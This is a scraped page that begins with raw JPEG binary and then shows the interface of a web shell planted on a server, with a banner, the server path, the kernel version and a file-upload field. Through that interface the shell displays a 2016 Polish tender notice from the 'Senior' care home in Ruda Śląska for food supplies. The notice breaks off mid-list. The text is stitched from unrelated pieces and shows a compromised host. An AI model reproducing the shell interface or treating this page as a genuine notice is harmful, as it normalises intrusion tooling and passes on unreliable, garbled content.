JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161202/357454-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.dps-senior.pl' target='_blank'>http://bip.dps-senior.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 357454 - 2016
              z dnia 2016-12-02 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Ruda Śląska: Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej Senior w Rudzie Śląskiej w I połowie 2017r.
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Dom Pomocy Społecznej "Senior" w Rudzie Śląskiej, krajowy numer identyfikacyjny
              124590400000, ul.
              ul. Puszkina 
              7,
              41704  
              Ruda Śląska, woj.
              śląskie, państwo
              Polska, tel.
              322 481 774, e-mail
              dps_senior@wp.pl, faks
              032 2481774 w. 33.
              <br />
              Adres strony internetowej (URL): http://bip.dps-senior.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Samorządowa jednostka budżetowa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.dps-senior.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w siedzibie Zamawiającego tj. Dom Pomocy Społecznej Senior  w Rudzie Śląskiej, 41- 704 Ruda Śl., ul. Puszkina 7- pokój nr 1, lub przesłać ofertę pocztą na powyższy adres<br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej Senior w Rudzie Śląskiej w I połowie 2017r.
<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zamówienie realizowane będzie z podziałem na wyszczególnione poniżej pakiety:


Pakiet nr 1	Dostawa przetworów spożywczych 
Pakiet nr 2	Dostawa artykułów sypkich 
Pakiet nr 3	Dostawa artykułów nabiałowych 
Pakiet nr 4	Dostawa pieczywa 
Pakiet nr 5	Dostawa wypieków cukierniczych 
Pakiet nr 6	Dostawa warzyw świeżych i suszonych 
Pakiet nr 7	Dostawa owoców świeżych 
Pakiet nr 8	Dostawa warzyw i owoców mrożonych 
Pakiet nr 9	Dostawa ryb mrożonych, wędzonych i przetworów rybnych 
Pakiet nr 10 	Dostawa mięsa wieprzowego i wołowego oraz podrobów 
Pakiet nr 11 	Dostawa mięsa i podrobów drobiowych 
Pakiet nr 12 	Dostawa wędlin 
Pakiet nr 13 	Dostawa jaj kurzych 
Pakiet nr 14	Dostawa czekolad i wyrobów cukierniczych 
Pakiet nr 15 	Dostawa napojów bezalkoholowych <br /><br /><b>II.5) Główny kod CPV: </b>15000000-8<br /><b> Dodatkowe kody CPV:</b>15131000-5,
                15330000-0,
                15410000-5,
                15600000-4,
                15800000-6,
                15500000-3,
                15400000-2,
                15810000-9,
                03200000-3,
                15331135-2,
                03200000-3,
                15200000-0,
                15110000-2,
                15131100-6,
                03142500-3,
                15980000-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 6<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca musi dysponować środkiem transportu przeznaczonym do przewozu artykułów spożywczych (żywnościowych). Wszystkie artykuły spożywcze winny być przewożone w taki sposób, aby nie została naruszona ich jakość oraz cechy organoleptyczne określone w przepisach o warunkach zdrowotnych żywności i żywienia.   


<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.W celu potwierdzenia braku podstawy do wykluczenia Wykonawcy z postępowania, o której mowa w art. 24 ust. 1 pkt 23 ustawy, Wykonawca składa, stosownie do treści art. 24 ust 11 ustawy (w terminie 3 dni od dnia zamieszczenia przez Zamawiającego na stronie internetowej informacji z otwarcia ofert, tj. informacji, o których mowa w art.86 ust. 5 ustawy) oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej  Załącznik nr 4 do SIWZ. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
 
2.Dokument (np. zobowiązanie), o którym mowa w XII rozdziale punkcie 2 SIWZ, innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji, o ile Wykonawca korzysta ze zdolności innych podmiotów na zasadach określonych w art. 22a ustawy</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/12/2016, godzina: 11:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>DOSTAWA PRZETWORÓW SPOŻYWCZYCH<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp	Nazwa artykułu	Sugerowana wielkość
                             opakowania	     Jm	   Orientacyjna ilość
                                                     zamówienia*
I	Przetwory, tłuszcze roślinne

1Ananas kons. plastry - masa netto bez zalewy	300-1000g	kg  12                                                              			
2	Brzoskwinie konserwowe - masa netto bez zalewy	300-1000g	kg	10,00				
3	Krem chrzanowy	150-300g	kg	7,00				
